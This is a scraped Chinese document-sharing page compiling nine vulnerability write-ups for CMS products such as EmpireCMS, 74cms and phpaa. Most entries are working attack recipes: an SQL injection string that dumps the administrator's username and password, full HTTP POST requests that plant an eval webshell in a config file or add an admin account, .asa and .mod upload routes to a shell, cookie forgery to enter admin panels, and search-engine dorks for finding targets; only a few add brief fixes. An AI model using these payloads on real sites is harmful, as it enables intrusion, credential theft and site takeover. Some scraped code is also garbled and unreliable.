当前位置：首页 > 实用文档 > 其他范文> 帝国CMS 留言本多字节漏洞漏洞预警

帝国CMS 留言本多字节漏洞漏洞预警

时间：2023-04-15 07:30:33 其他范文收藏本文下载本文

帝国CMS 留言本多字节漏洞漏洞预警（通用9篇）由网友“DECA”投稿提供，以下是小编收集整理的帝国CMS 留言本多字节漏洞漏洞预警，欢迎阅读与借鉴。

帝国CMS 留言本多字节漏洞漏洞预警

篇1：帝国CMS 留言本多字节漏洞漏洞预警

作者：深灰

找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写:\\

联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from

phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码

篇2：帝国CMS后台密码重置漏洞漏洞预警

5.0及以前版本：用phpmyadmin修改phome_enewsuser表，把password字段的值设为：e10adc3949ba59abbe56e057f20f883e

密码就是：123456

5.1版本：用phpmyadmin修改phome_enewsuser表里的记录：把password字段的值设为：“322d3fef02fc39251436cb4522d29a71”；把salt字段的值设为：“abc”.

密码就是：123456

篇3：帝国cms 7.0 后台拿shell漏洞预警

帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码，

进入后台~！

方法一：系统——数据表与系统模型——管理数据表再随意选择一个数据表，打开对应数据表的“管理系统模型”如图：

“导入系统模型”，可进入“LoadInM.php”页面，如图：

在本地新建一个文件，文本内容为

再命名为1.php.mod，导入这个mod文件，即执行里面的php代码，在ecmsmod.php的相同目录下生产x.php的一句话木马文件，

可以从导入系统模型源文件中查看到,如图：

方法二：

在本地新建一个info.php（任意php文件）其源码内容为

再重名名为info.php.mod，将此文件按照方法一导入系统模型

即可执行info.php.mod的代码并显示在页面上，迅速查看源码即可得知网站根目录的绝对路径,如图：

info.php.mod的源码

然后

系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码：

即可在网站根目录生成 z.php 菜刀连接即可~！

篇4：餐厅cms getshell漏洞漏洞预警

漏洞类型：代码执行

关键字：inurl:index.php?m=shopcar

问题出在/install/index.php文件，在程序安装完后，会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。

<?phpif(file_exists(“../install.lock”)){header(“Location: ../”);//没有退出}//echo 'tst';exit;require_once(“init.php”);if(empty($_REQUEST['step']) || $_REQUEST['step']==1){

可见在/install/index.php存在时，只是header做了302重定向并没有退出，也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。

1、getshell（很危险）

if(empty($_REQUEST['step']) || $_REQUEST['step']==1){$smarty->assign(“step”,1);$smarty->display(“index.html”);}elseif($_REQUEST['step']==2){$mysql_host=trim($_POST['mysql_host']);$mysql_user=trim($_POST['mysql_user']);$mysql_pwd=trim($_POST['mysql_pwd']);$mysql_db=trim($_POST['mysql_db']);$tblpre=trim($_POST['tblpre']);$domain==trim($_POST['domain']);$str=“<?php \r\n”;$str.='define(“MYSQL_HOST”,“'.$mysql_host.'”);'.“\r\n”;$str.='define(“MYSQL_USER”,“'.$mysql_user.'”);'.“\r\n”;$str.='define(“MYSQL_PWD”,“'.$mysql_pwd.'”);'.“\r\n”;$str.='define(“MYSQL_DB”,“'.$mysql_db.'”);'.“\r\n”;$str.='define(“MYSQL_CHARSET”,“GBK”);'.“\r\n”;$str.='define(“TABLE_PRE”,“'.$tblpre.'”);'.“\r\n”;$str.='define(“DOMAIN”,“'.$domain.'”);'.“\r\n”;$str.='define(“SKINS”,“default”);'.“\r\n”;$str.='?>';file_put_contents(“../config/config.inc.php”,$str);//将提交的数据写入php文件

上面的代码将POST的数据直接写入了../config/config.inc.php文件，那么我们提交如下POST包，即可获得一句话木马

-----------post----------

POST /canting/install/index.php?m=index&step=2 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 126

mysql_host=test“);@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

---------post----------

但是这个方法很危险，将导致网站无法运行，

2、直接添加管理员

elseif($_REQUEST['step']==5){if($_POST){ require_once(”../config/config.inc.php“);$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);mysql_select_db(MYSQL_DB,$link);mysql_query(”SET NAMES “.MYSQL_CHARSET );mysql_query(”SET sql_mode=''“);$adminname=trim($_POST['adminname']);$pwd1=trim($_POST['pwd1']);$pwd2=trim($_POST['pwd2']);if(empty($adminname)){echo ”“;exit;}if(($pwd1!=$pwd2) or empty($pwd1)){echo ”“;//这里也是没有退出}mysql_query(”insert into “.TABLE_PRE.”admin(adminname,password,isfounder) values('$adminname','“.umd5($pwd1).”',1)“);//直接可以插入一个管理员}

这样的话我们就可以直接插入一个管理员帐号，语句如下：

POST /canting/install/index.php?m=index&step=5 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen

篇5：帝国CMS(EmpireCMS)商品评分插件注入漏洞漏洞预警

由于对参数的变量未作初始化检测导致 pf\rate.php 和 pf\ratemovie.php 中变量 $id 存在注入风险，

$id=$_GET[''id''];$query=”SELECT infopfen,infopfennum FROM phome_ecms_shop WHERE id=$id“;$result=mysql_query($query);$v=$_GET[''v''];$id=$_GET[''id''];$query=”UPDATE phome_ecms_shop SET infopfen = infopfen + $v,infopfennum = infopfennum+1 WHERE id=$id“;$result=mysql_query($query);$query=”SELECT infopfen,infopfennum FROM phome_ecms_shop WHERE id=$id“;

$result=mysql_query($query);

修复方案：

过滤

篇6：80After CMS V4 鸡肋上传漏洞漏洞预警

By：小A

官方网址:www.reaft.com/

Cms下载地址:www.reaft.com/html/1/200.html

界面做的还不错，搜索了一下好像用的人很少，开始，

首先看目录下 UpLoad.html 文件上传，调用了的是 UpLoad.asp。

UpLoad.asp：

文件上传

dim upload

set upload = new AnUpLoad

upload.Exe = ”*“

upload.MaxSize = 4 * 1024 * 1024 '4M

upload.GetData

if upload.ErrorID>0 then

response.Write upload.Description

else

postMess(”images/operate_02.jpg“)

dim savpath

savepath = ”/upload/“&year(date())&”/“&month(date())&”/“

for each f in upload.files(-1)

dim file

set file = upload.files(f)

if not(file is nothing) then

if file.saveToFile(savepath,0,true) then

postMess(”images/operate_01.jpg“)

postValue = postValue&”“&savepath&file.filename&”|“

response.write (”“)

end if

set file = nothing

end if

set upload = nothing

然后在来看看：UpLoad_Class.vbs.asp。

UpLoad_Class.vbs.asp：

'=========================================================

'类名: AnUpLoad(艾恩无组件上传类)

'=========================================================

C省略N行代码

Public Function GetWH()

'本函数代码参考网络

On Error Resume Next

mvarExtend = lcase(mvarExtend)

if instr(”|jpg|jpeg|bmp|png|gif|asa|“,”|“ & mvarExtend & ”|“)<=0 then exit function

Dim m_binItem

Set m_binItem =server.CreateObject(”ADODB.Stream“)

m_binItem.Mode = 3

m_binItem.Type = 1

m_binItem.Open

Dim Info

Set Info = server.CreateObject(”ADODB.Recordset“)

Info.Fields.Append ”value“, 205, -1

Info.Open

Info.AddNew

Info(”value“).AppendChunk (mvarValue)

m_binItem.Write (Info(”value“))

Info(”value“).AppendChunk (Null)

Info.Update

Info.Close

Set Info = Nothing

select case lcase(mvarExtend)

case ”jpg“,”jpeg“

m_binItem.Position=3

do while not m_binItem.EOS

intTemp = Ascb(m_binItem.Read(1))

loop while intTemp = 255 and not m_binItem.EOS

if intTemp < 192 or intTemp >195 then

m_binItem.read(Bin2Val(m_binItem.Read(2))-2)

else

Exit do

end if

intTemp = Ascb(m_binItem.Read(1))

loop while intTemp < 255 and not m_binItem.EOS

loop

m_binItem.Read(3)

mvarHeight = Bin2Val(m_binItem.Read(2))

mvarWidth = Bin2Val(m_binItem.Read(2))

case ”gif“

if Lcase(strFext)”gif“ then strFext=”gif“

m_binItem.Position=6

mvarWidth = BinVal2(m_binItem.Read(2))

mvarHeight = BinVal2(m_binItem.Read(2))

case ”png“

if Lcase(strFext)”png“ then strFext=”png“

m_binItem.Position=18

mvarWidth = Bin2Val(m_binItem.Read(2))

m_binItem.Read(2)

mvarHeight = Bin2Val(m_binItem.Read(2))

case ”bmp“

if Lcase(strFext)”bmp“ then strFext=”bmp“

m_binItem.Position=18

mvarWidth = BinVal2(m_binItem.Read(4))

mvarHeight = BinVal2(m_binItem.Read(4))

case ”asa“

if Lcase(strFext)”asa“ then strFext=”asa“

m_binItem.Position=18

mvarWidth = BinVal2(m_binItem.Read(2))

mvarHeight = BinVal2(m_binItem.Read(2))

end select

m_binItem.Close

If err then

mException=Err.Description

End If

End Function

看红色部分，其他就不解释了，

直接上传asa拿shell。

还有就是上传可能会提示登录，直接伪造session就可以通过了。（站长评论：什么、？伪造 Session？？？……我了个擦，这要是能伪造，那岂不、、、小A同学可能是看错了，当成了cookie ……）

验证代码在 admin.asp。

admin.asp：

if session(”username“)=”“ and session(”password“)=”“ then

session(”Errortxt“)=”登录超时，请重新登陆“

response.Redirect(”login.asp“)

response.end

end if

其他就不多说了！

重新编辑了一下，第一次发贴，格式不对，请见谅。

这个应该算是一个漏洞吧，不知道是不是作者故意加上的，在上传扩展名，检查那里，居然加了个asa,无意间发现的。

篇7：phpaa cms 0day及修复漏洞预警

Author:BlAck.Eagle

cookie欺骗

漏洞文件：/admin/global.php

/**

* 后台公用配置文件

* 用于后台应用初始化、后台权限验证等

require_once '../data/config.inc.php'; //系统初始化文件

require_once '../include/function.admin.php'; //后台公用函数库

//后台登陆验证

if (!isset($_COOKIE['userid']) empty($_COOKIE['userid'])){ //程序员只是判断了 userid是否存在，当然可以绕过，

phpaa cms 0day及修复漏洞预警

，

防范的话就是session验证或者生成随机数的cookie

setcookie(lastURL,get_url());//上次访问地址

header(”Location: login.php“);

}

利用方式：通过cookie&&sqlinjection工具伪造userid=任意值。然后访问/admin/index.php即可进入后台

修复方案：

进行session验证或者生成随机数的cookie

篇8：骑士CMS SQL注入漏洞漏洞预警

骑士CMS人才系统，ajax_output.php页面参数过滤不严存在SQL注入漏洞，

漏洞文件：ajax_output.php

$category_id=trim($_GET['category_id']); if (($category_id+0)>0 && intval($category_id)==$category_id) //只用了if判断并没有执行

EXP：

127.0.0.1/74cms/ajax_output.php?act=index_jobscategory&category_id=4

漏洞修补：

$category_id=intval(trim($_GET['category_id']));

篇9：Alcassofts SOPHIA CMS SQL注入漏洞漏洞预警

Alcassoft's SOPHIA是一款国际化、功能强大的内容管理系统，Alcassoft's SOPHIA中的dsp_page.cfm文件存在sql注入漏洞，可能导致敏感信息泄露。

Title : Alcassoft's SOPHIA CMS Vulnerable to SQL Injection

Found by: p0pc0rn 24/02/2011

Web : www.alcassoft.com/site/

Dork : intext:”Powered by Alcassoft SOPHIA"

[+]poc:

~~~~~~~~~

site.com/path/dsp_page.cfm?pageid=[SQL]

★ 星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

★ 齐博CMS验证码美化教程

★ Linux Kiss Server lks.c文件多个格式串处理漏洞

★ CMSZERO企业网站管理系统功能介绍

★ ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复

★ dedecms 补出来的一个鸡肋漏洞漏洞预警

★ 国内CMS现状――带着垃圾站思想的CMS

★ AWStats 6.4及以下版本多个漏洞以及分析

★ LNK文件漏洞简要分析

★ Podcast Generator多个模块文件包含和任意文件删除漏洞

《帝国CMS 留言本多字节漏洞漏洞预警.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

下载本文

【帝国CMS 留言本多字节漏洞漏洞预警（通用9篇）】相关文章：

Manhali v1.8本地文件包含缺陷及修复2022-08-19

WordPress博客常用的两个调用缩略图的方法2023-06-30

opera9.52使用ajax读取本地文件漏洞进一步利用漏洞预警2023-04-03

IOS LPD远程缓冲区溢出漏洞2022-04-30

Linux Kernel ELF文件跨区域映射本地拒绝服务漏洞2023-09-01

Bambook某频道SQL注射漏洞及修复2022-08-31

对PHP的CMS程序的一些建议和看法2022-09-17

数据相关的口号2022-08-20

Samba nmbdpackets.c NetBIOS 回复栈有溢出漏洞2022-04-30

脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警2023-07-12